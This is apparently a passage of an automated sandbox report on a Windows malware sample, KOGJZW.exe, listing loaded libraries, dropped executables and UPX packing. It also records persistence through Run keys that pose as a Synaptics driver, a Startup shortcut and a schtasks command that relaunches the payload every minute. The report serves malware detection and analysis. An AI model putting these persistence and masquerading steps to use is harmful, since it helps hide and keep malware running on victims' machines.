Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Section loaded: propsys.dll

Source: C:\Users\user\Desktop\KOGJZW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: WSFDII.lnk.2.dr

LNK file: ..\..\..\..\..\Windata\VZVDVH.exe

Source: C:\ProgramData\Synaptics\Synaptics.exe

File written: C:\Users\user\AppData\Local\Temp\xbm2HR9.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: KOGJZW.exe

Static file information: File size 1730560 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0057D0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_0057D0C0

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00437795 push ecx; ret	2_2_004377A8
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0043CB5D push edi; ret	2_2_0043CB5F
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0043CC76 push esi; ret	2_2_0043CC78
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00418D99 push edi; retn 0000h	2_2_00418D9B
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00418F0E push F7FFFFFFh; retn 0000h	2_2_00418F13
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003A7795 push ecx; ret	9_2_003A77A8
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003ACB5D push edi; ret	9_2_003ACB5F
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003ACC76 push esi; ret	9_2_003ACC78
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_00388D99 push edi; retn 0000h	9_2_00388D9B
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_00388F0E push F7FFFFFFh; retn 0000h	9_2_00388F13

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Source: C:\Users\user\Desktop\KOGJZW.exe	File created: C:\Users\user\Desktop\._cache_KOGJZW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	File created: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KOGJZW.exe	File created: C:\ProgramData\Synaptics\RCX97B8.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\KOGJZW.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\~$cache1	Jump to dropped file

Source: C:\Users\user\Desktop\KOGJZW.exe	File created: C:\ProgramData\Synaptics\RCX97B8.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\KOGJZW.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WSFDII.lnk

Jump to behavior

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WSFDII.lnk

Jump to behavior

Source: C:\Users\user\Desktop\KOGJZW.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WSFDII	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WSFDII	Jump to behavior

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_0042F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_0042F78E
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00477F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00477F0E
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_0039F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	9_2_0039F78E
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003E7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	9_2_003E7F0E

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_00431E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00431E5A

Source: C:\ProgramData\Synaptics\Synaptics.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\KOGJZW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
